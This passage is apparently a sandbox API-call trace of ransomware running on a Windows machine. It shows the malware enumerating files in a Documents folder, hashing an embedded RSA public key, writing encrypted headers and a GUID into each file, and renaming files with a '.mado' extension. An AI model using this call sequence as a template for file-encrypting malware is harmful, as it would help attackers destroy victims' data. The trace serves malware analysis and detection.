KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.853] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.853] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.854] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.854] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.854] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.854] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.854] GetLastError () returned 0x0 [0205.854] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.854] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.855] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.855] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.855] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.855] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.856] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x15255, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.856] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.856] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.856] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.856] CloseHandle (hObject=0x63c) returned 1 [0205.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0205.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b74b68 [0205.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.858] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\q-RNyzyi5Ha.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\iz56a9brq3kdvjgs8nb\\q-rnyzyi5ha.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\q-RNyzyi5Ha.odt.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\iz56a9brq3kdvjgs8nb\\q-rnyzyi5ha.odt.mado")) returned 1 [0205.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.858] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.859] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22b86ee0, ftCreationTime.dwHighDateTime=0x1d5dd67, ftLastAccessTime.dwLowDateTime=0x65fc0500, ftLastAccessTime.dwHighDateTime=0x1d5dcee, ftLastWriteTime.dwLowDateTime=0x65fc0500, ftLastWriteTime.dwHighDateTime=0x1d5dcee, nFileSizeHigh=0x0, nFileSizeLow=0xac5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvune.pps", cAlternateFileName="")) returned 1 [0205.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x32b69d8 [0205.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.860] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\uvune.pps") returned=".pps" [0205.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\uvune.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\iz56a9brq3kdvjgs8nb\\uvune.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.861] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=44127) returned 1 [0205.861] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.863] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xac39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.863] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.864] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.864] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xac5f, lpOverlapped=0x0) returned 1 [0205.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.865] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.866] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.866] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.866] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.866] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.866] GetLastError () returned 0x0 [0205.866] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.866] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.866] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.866] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.866] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xac60) returned 0x3b81690 [0205.867] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66a08 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66a50 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feac0 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb38 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.867] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb38 | out: hHeap=0x2c0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb38 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32feb08 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32feaf0 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72b80 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72c98 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb38 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.868] GetCurrentThreadId () returned 0x600 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32fec98 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.869] GetCurrentThreadId () returned 0x600 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32c64e8 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0205.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb38 [0205.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fead8 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb20 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79968 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79980 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb38 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79980 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72db0 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72ec8 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74b68 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 